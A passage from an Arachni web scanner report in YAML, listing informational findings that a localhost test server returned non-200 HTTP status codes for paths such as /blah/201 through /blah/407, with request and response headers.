      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "502506"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/502
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/505
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 505"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 505"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "5052332"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/505
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/102
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Connection: close
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 102"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 102"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: ""
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/102
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/201
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 201"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 201"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2017730"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/201
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/202
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 202"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 202"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2021169"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/202
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/203
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 203"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 203"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2035366"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/203
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/206
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 206"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 206"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2064530"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/206
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/207
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 207"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 207"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2072403"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/207
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/208
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 208"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 208"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2088917"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/208
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/226
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 226"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 226"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "2267961"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/226
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/300
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 300"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 300"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3005303"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/300
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/301
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 301"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 301"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3014670"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/301
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/302
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 302"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 302"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3027772"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/302
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/303
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 303"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 303"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3035468"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/303
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/305
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 305"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 305"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3051515"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/305
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/306
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 306"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 306"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3065429"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/306
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/307
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 307"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 307"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3072668"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/307
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/308
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 308"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 308"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "3081368"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/308
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/400
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 400"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 400"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4005027"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/400
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/401
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 401"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 401"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "401943"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/401
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/402
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 402"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 402"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4022800"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/402
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/403
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "7"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 403"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 403"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "4032713"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/403
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/405
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 405"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 405"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "405745"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/405
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/406
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "5"
        Connection: keep-alive
        Server: thin 1.4.1 codename Chromeo
    id: "Code: 406"
    injected: 
    internal_modname: InterestingResponses
    method: GET
    mod_name: Interesting responses
    name: Interesting server response.
    opts: 
      :id: "Code: 406"
      :element: server
      :regexp: ""
    references: 
      w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
    regexp: ""
    regexp_match: 
    response: "40656"
    severity: Informational
    tags: 
    - interesting
    - response
    - server
    url: http://localhost:10675/blah/406
    var: 
    variations: []

    verification: false
  verification: false
- !ruby/object:Arachni::Issue 
  description: "The server responded with a non 200 (OK) code. "
  elem: server
  internal_modname: InterestingResponses
  method: GET
  mod_name: Interesting responses
  name: Interesting server response.
  references: 
    w3.org: http://www.w3.org/Protocols/rfc2616/rfc2616-sec10.html
  severity: Informational
  tags: 
  - interesting
  - response
  - server
  url: http://localhost:10675/blah/407
  var: 
  variations: 
  - !ruby/object:Arachni::Issue 
    description: "The server responded with a non 200 (OK) code. "
    elem: server
    headers: 
      request: 
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
        User-Agent: default
      response: 
        X-Frame-Options: sameorigin
        X-Xss-Protection: 1; mode=block
        Content-Type: text/html;charset=utf-8
        Content-Length: "6"
        Connection: keep-alive
